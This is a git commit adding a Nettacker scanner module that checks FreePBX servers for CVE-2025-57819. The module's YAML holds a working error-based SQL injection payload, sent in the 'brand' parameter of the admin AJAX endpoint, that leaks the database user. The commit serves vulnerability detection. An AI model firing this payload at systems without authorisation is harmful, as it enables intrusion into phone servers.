Added new vulnerability module for CVE-2025-57819

sankalp-b1401 · sankalp-b1401 · commit 755ad9f9d317 · 2026-04-06T18:12:01.000+05:30
diff --git a/docs/Modules.md b/docs/Modules.md
@@ -161,6 +161,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 - '**ProFTPd_integer_overflow_vuln**' - check ProFTPd for CVE-2011-1137
 - '**ProFTPd_memory_leak_vuln**' - check ProFTPd for CVE-2001-0136
 - '**ProFTPd_restriction_bypass_vuln**' - check ProFTPd for CVE-2009-3639
+- '**sangoma_freepbx_cve_2025_57819_vuln**' - check target for CVE-2025-57819
 - '**server_version_vuln**' - check if the web server is leaking server banner in 'Server' response header
 - '**smartermail_cve_2026_24423_vuln**' - check the target for SmarterMail CVE-2026-24423 vulnerability
 - '**sonicwall_sslvpn_cve_2024_53704_vuln**' - check the target for SonicWALL SSLVPN CVE-2024-53704 vulnerability
diff --git a/nettacker/modules/vuln/sangoma_freepbx_cve_2025_57819.yaml b/nettacker/modules/vuln/sangoma_freepbx_cve_2025_57819.yaml
@@ -0,0 +1,50 @@
+info:
+  name: sangoma_freepbx_cve_2025_57819_vuln
+  author: Sankalp Bansal
+  severity: 9.8
+  description: >
+    CVE-2025-57819 is a critical vulnerability in FreePBX 15, 16, 17.
+    Improper sanitization in the brand parameter of the endpoint
+    module leads to SQLi and Remote Code Execution possibly leading
+    to root privileges.
+  reference:
+    - https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-57819
+    - https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819/blob/main/README.md
+  profiles:
+    - vuln
+    - http
+    - critical_severity
+    - cve
+    - cve_2025
+    - sangoma
+    - freepbx
+    - cisa_kev
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{{ user_agent }}"
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x' AND EXTRACTVALUE(1,CONCAT('~USER:',(SELECT USER()),'~')) -- "
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+        response:
+          condition_type: and
+          conditions:
+            content:
+              regex: (?s)(?=.*XPATH syntax error.*~.*~)(?=.*utility\.functions\.php)(?=.*~USER:([^~]+)~)
+              reverse: false
